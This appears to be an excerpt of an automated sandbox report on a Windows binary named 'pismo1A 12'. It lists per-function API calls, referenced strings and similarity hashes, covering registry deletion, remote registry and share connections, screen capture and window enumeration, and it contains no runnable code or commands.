Part of subcall function 0072C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0072B6AE,?,?), ref: 0072C9B5
Part of subcall function 0072C998: _wcslen.LIBCMT ref: 0072C9F1
Part of subcall function 0072C998: _wcslen.LIBCMT ref: 0072CA68
Part of subcall function 0072C998: _wcslen.LIBCMT ref: 0072CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0072B6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0072B772
RegDeleteValueW.ADVAPI32(?,?), ref: 0072B80A
RegCloseKey.ADVAPI32(?), ref: 0072B87E
RegCloseKey.ADVAPI32(?), ref: 0072B89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 0072B8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0072B904
RegDeleteKeyW.ADVAPI32(?,?), ref: 0072B922
FreeLibrary.KERNEL32(00000000), ref: 0072B983
RegCloseKey.ADVAPI32(00000000), ref: 0072B994

Strings

advapi32.dll, xrefs: 0072B8ED
RegDeleteKeyExW, xrefs: 0072B8FE

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: edfa6e7378baac3aa55f74f6f291b7fcc3a8edc16ec200f9779adbcf9cb7c744
Instruction ID: 26ddfb0acd777ac6e62fff0523f6ba72261453c13f7c0729685052143c7b639e
Opcode Fuzzy Hash: edfa6e7378baac3aa55f74f6f291b7fcc3a8edc16ec200f9779adbcf9cb7c744
Instruction Fuzzy Hash: E9C18A34208211EFD714EF24D494F2ABBE5BF85318F14849CF59A8B2A2CB39EC45CB91

Function 0072255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 007225D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 007225E8
CreateCompatibleDC.GDI32(?), ref: 007225F4
SelectObject.GDI32(00000000,?), ref: 00722601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0072266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 007226AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 007226D0
SelectObject.GDI32(?,?), ref: 007226D8
DeleteObject.GDI32(?), ref: 007226E1
DeleteDC.GDI32(?), ref: 007226E8
ReleaseDC.USER32(00000000,?), ref: 007226F3

Strings

(, xrefs: 0072268D

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 5e140405349f14bef519bae2d1b930cf877fefad3650f441e8d4e1c818aa0b3b
Instruction ID: 07d1050877cc11105a2a609401beb319672b2a0132ba8ceeb2ea7621b33a2c02
Opcode Fuzzy Hash: 5e140405349f14bef519bae2d1b930cf877fefad3650f441e8d4e1c818aa0b3b
Instruction Fuzzy Hash: 396113B6D00219EFDF15CFA4DC84AAEBBB6FF48310F208429E955A7250D774A941CF64

Function 006DDA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 006DDAA1

Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD659
Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD66B
Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD67D
Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD68F
Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD6A1
Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD6B3
Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD6C5
Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD6D7
Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD6E9
Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD6FB
Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD70D
Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD71F
Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD731

_free.LIBCMT ref: 006DDA96

Part of subcall function 006D29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,006DD7D1,00000000,00000000,00000000,00000000,?,006DD7F8,00000000,00000007,00000000,?,006DDBF5,00000000), ref: 006D29DE
Part of subcall function 006D29C8: GetLastError.KERNEL32(00000000,?,006DD7D1,00000000,00000000,00000000,00000000,?,006DD7F8,00000000,00000007,00000000,?,006DDBF5,00000000,00000000), ref: 006D29F0

_free.LIBCMT ref: 006DDAB8
_free.LIBCMT ref: 006DDACD
_free.LIBCMT ref: 006DDAD8
_free.LIBCMT ref: 006DDAFA
_free.LIBCMT ref: 006DDB0D
_free.LIBCMT ref: 006DDB1B
_free.LIBCMT ref: 006DDB26
_free.LIBCMT ref: 006DDB5E
_free.LIBCMT ref: 006DDB65
_free.LIBCMT ref: 006DDB82
_free.LIBCMT ref: 006DDB9A

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 5fd5e31266300c099d94a075196fd366224b7679fe77be2a5f088ddcea899e6e
Instruction ID: 2241e99c7f60839ffd07b0983069f4721184d4e85bf8db2cbbc6f475e360c975
Opcode Fuzzy Hash: 5fd5e31266300c099d94a075196fd366224b7679fe77be2a5f088ddcea899e6e
Instruction Fuzzy Hash: 87317C71E042069FEB61BA39E851B9A77EAFF10714F14442FE449DB391DA30AC409724

Function 0070365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0070369C
_wcslen.LIBCMT ref: 007036A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00703797
GetClassNameW.USER32(?,?,00000400), ref: 0070380C
GetDlgCtrlID.USER32(?), ref: 0070385D
GetWindowRect.USER32(?,?), ref: 00703882
GetParent.USER32(?), ref: 007038A0
ScreenToClient.USER32(00000000), ref: 007038A7
GetClassNameW.USER32(?,?,00000100), ref: 00703921
GetWindowTextW.USER32(?,?,00000400), ref: 0070395D

Strings

%s%u, xrefs: 00703734

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: 3b3a895bbeff19dfbad19e193a2e82ddaf36a88ef2bcf795306b83aa8e451709
Instruction ID: 89f6bc9b4187392357892ea569b0d5c0cf5bddd9b17231cc30a8a2463fdf7414
Opcode Fuzzy Hash: 3b3a895bbeff19dfbad19e193a2e82ddaf36a88ef2bcf795306b83aa8e451709
Instruction Fuzzy Hash: DE919B71204606EFD719DF24C885FAAB7EDFF44354F008629F99AD21D0DB38AA45CBA1

Function 00704954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00704994
GetWindowTextW.USER32(?,?,00000400), ref: 007049DA
_wcslen.LIBCMT ref: 007049EB
CharUpperBuffW.USER32(?,00000000), ref: 007049F7
_wcsstr.LIBVCRUNTIME ref: 00704A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 00704A64
GetWindowTextW.USER32(?,?,00000400), ref: 00704A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00704AE6
GetClassNameW.USER32(?,?,00000400), ref: 00704B20
GetWindowRect.USER32(?,?), ref: 00704B8B

Strings

ThumbnailClass, xrefs: 00704A6F, 00704AF1

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 53957fd09a26db3424b08ec73d2659addd562f9289c6c501e3e65ef5bd791f28
Instruction ID: 20a7fd53d301464ebf5b319f36d6abe5837c4b62333b43f3676abb03d2940dc3
Opcode Fuzzy Hash: 53957fd09a26db3424b08ec73d2659addd562f9289c6c501e3e65ef5bd791f28
Instruction Fuzzy Hash: E591AAB2104205DBDB04DF14C985FAA77E9FF84314F048669FE869A0D6EB38ED45CBA1

Function 00738D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 006B9BB2

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00738D5A
GetFocus.USER32 ref: 00738D6A
GetDlgCtrlID.USER32(00000000), ref: 00738D75
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00738E1D
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00738ECF
GetMenuItemCount.USER32(?), ref: 00738EEC
GetMenuItemID.USER32(?,00000000), ref: 00738EFC
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00738F2E
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00738F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00738FA1

Strings

0, xrefs: 00738E9F

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: 48541787d12fdb4396ca53f0f9a2089c8b28c02472e28f9ba1f531515b7b8be7
Instruction ID: df6afca90daaaad7b448a32b007ac2435954f39ed51c10d934c9f0ea8a7e9bf0
Opcode Fuzzy Hash: 48541787d12fdb4396ca53f0f9a2089c8b28c02472e28f9ba1f531515b7b8be7
Instruction Fuzzy Hash: D281D171504311AFE761DF24C884EABBBE9FF88354F14491DF994A7292DB38D901CB62

Function 0070DC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 0070DC20
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0070DC46
_wcslen.LIBCMT ref: 0070DC50
_wcsstr.LIBVCRUNTIME ref: 0070DCA0
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0070DCBC

Strings

%u.%u.%u.%u, xrefs: 0070DD9A
04090000, xrefs: 0070DCF2
DefaultLangCodepage, xrefs: 0070DD1F
\VarFileInfo\Translation, xrefs: 0070DCB4
StringFileInfo\, xrefs: 0070DC8F

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: 5deddef655e4bf408db7b0c87880533fde342e42097cf725d0d3039ee77b7409
Instruction ID: 1353166559cd1df799a633989a1855b4db1f08779341b931730a1f67a6e6a75f
Opcode Fuzzy Hash: 5deddef655e4bf408db7b0c87880533fde342e42097cf725d0d3039ee77b7409
Instruction Fuzzy Hash: BD41E5B2640311BAE751A7749C07EFF77ADEF41710F10016EF901A6192EA68DE0187B8

Function 0072CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0072CC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0072CC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0072CD48

Part of subcall function 0072CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0072CCAA
Part of subcall function 0072CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0072CCBD
Part of subcall function 0072CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0072CCCF
Part of subcall function 0072CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0072CD05
Part of subcall function 0072CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0072CD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 0072CCF3

Strings

advapi32.dll, xrefs: 0072CCB8
RegDeleteKeyExW, xrefs: 0072CCC9

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 0db65943e506dfa2b9233eaf691fc57c9065fd270cdc635b296a410a066b8676
Instruction ID: 0c9b937aa7d8f24096ba8d26a1e2a6fff004a54991274e09c13941841cd11a66
Opcode Fuzzy Hash: 0db65943e506dfa2b9233eaf691fc57c9065fd270cdc635b296a410a066b8676
Instruction Fuzzy Hash: 5C3180B5A01129BBE7228B61EC88EFFBB7CEF15741F004165A906E7140D6789E45EBB0

Function 0070E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0070E6B4

Part of subcall function 006BE551: timeGetTime.WINMM(?,?,0070E6D4), ref: 006BE555

Sleep.KERNEL32(0000000A), ref: 0070E6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0070E705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0070E727
SetActiveWindow.USER32 ref: 0070E746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0070E754
SendMessageW.USER32(00000010,00000000,00000000), ref: 0070E773
Sleep.KERNEL32(000000FA), ref: 0070E77E
IsWindow.USER32 ref: 0070E78A
EndDialog.USER32(00000000), ref: 0070E79B

Strings

BUTTON, xrefs: 0070E719

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 0768d6cdf5062dfb11b8bf8d5aaca7385c0550e05dfdfc736fd125d0d06750cd
Instruction ID: 93171b1712206e5081e77dfeca2b9b63a28fe41a93897102e2304d62b7997657
Opcode Fuzzy Hash: 0768d6cdf5062dfb11b8bf8d5aaca7385c0550e05dfdfc736fd125d0d06750cd
Instruction Fuzzy Hash: 652162B1300204EFFB016F24EC89A253BA9E75438AF649925F51AD15E2DB7E9C419B1C

Function 0070E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0070EA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0070EA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0070EA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0070EA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0070EAA7

Strings

alias PlayMe, xrefs: 0070EA36
open , xrefs: 0070EA0C
play PlayMe wait, xrefs: 0070EA91
close PlayMe, xrefs: 0070EA6E, 0070EA9B
status PlayMe mode, xrefs: 0070EA58
play PlayMe, xrefs: 0070EAA2

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 22809948abbbb27304fd378a37476fb0e74e98f1a60c673ba017f37ee20a29b6
Instruction ID: 21f06329cda9b778a28cdace0f04dae0d0b8fd59f49b479479c9c48f8fd354af
Opcode Fuzzy Hash: 22809948abbbb27304fd378a37476fb0e74e98f1a60c673ba017f37ee20a29b6
Instruction Fuzzy Hash: 161151B1A5026979D760B7A1DC4ADFF6ABCEBD6B40F44492D7C02A20D1EEB41D05C9B0

Function 006B8BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 006B8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,006B8BE8,?,00000000,?,?,?,?,006B8BBA,00000000,?), ref: 006B8FC5

DestroyWindow.USER32(?), ref: 006B8C81
KillTimer.USER32(00000000,?,?,?,?,006B8BBA,00000000,?), ref: 006B8D1B
DestroyAcceleratorTable.USER32(00000000), ref: 006F6973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,006B8BBA,00000000,?), ref: 006F69A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,006B8BBA,00000000,?), ref: 006F69B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,006B8BBA,00000000), ref: 006F69D4
DeleteObject.GDI32(00000000), ref: 006F69E6

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 37abb6adb3420ff4155ff221bedf60567fbedc66a8be02f435baf2750aafea36
Instruction ID: 09191c7d0aa15586a177b0927d198bc55e3bc274aaf94f232fb08bde55e344d2
Opcode Fuzzy Hash: 37abb6adb3420ff4155ff221bedf60567fbedc66a8be02f435baf2750aafea36
Instruction Fuzzy Hash: 5861DCB1002705DFDB268F18C948BB57BF6FB40352F54881CE2469B660CB79A8D2DF98

Function 006B9838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 006B9944: GetWindowLongW.USER32(?,000000EB), ref: 006B9952

GetSysColor.USER32(0000000F), ref: 006B9862

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 487991aaa57c3c6f9039ef20de7dbde451259fc43dda6daf6b6b59d2b775b7b2
Instruction ID: 532dc5fb92832fb5d5a0eadc8579d4cc0adcefe79de17b875be8637deeeacd59
Opcode Fuzzy Hash: 487991aaa57c3c6f9039ef20de7dbde451259fc43dda6daf6b6b59d2b775b7b2
Instruction Fuzzy Hash: 7841B7B11046549FDB215F389C44BF937B6EB06331F148A15FBA29B2E1D7359C82DB20

Function 007096E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,006EF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00709717
LoadStringW.USER32(00000000,?,006EF7F8,00000001), ref: 00709720

Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,006EF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00709742
LoadStringW.USER32(00000000,?,006EF7F8,00000001), ref: 00709745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00709866

Strings

Error: , xrefs: 0070981D
Line %d:, xrefs: 007097A0
%s (%d) : ==> %s: %s %s, xrefs: 0070984A
^ ERROR, xrefs: 007097FB
Line %d (File "%s"):, xrefs: 0070978F

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 63fadc4f341fee41e6477a703a30a66c659036bae023d8effcdbdec2fa3e2ed0
Instruction ID: 023cf2a8adb630f5aa765e847e8de1e92dd9b3e287cbeca3f5f2a566147aaa5a
Opcode Fuzzy Hash: 63fadc4f341fee41e6477a703a30a66c659036bae023d8effcdbdec2fa3e2ed0
Instruction Fuzzy Hash: E8415D72800219AACF44FBE0CD46DEE7779AF56340F604129F60672192EB396F48CF65

Function 007006DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 006A6B57: _wcslen.LIBCMT ref: 006A6B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 007007A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 007007BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 007007DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00700804
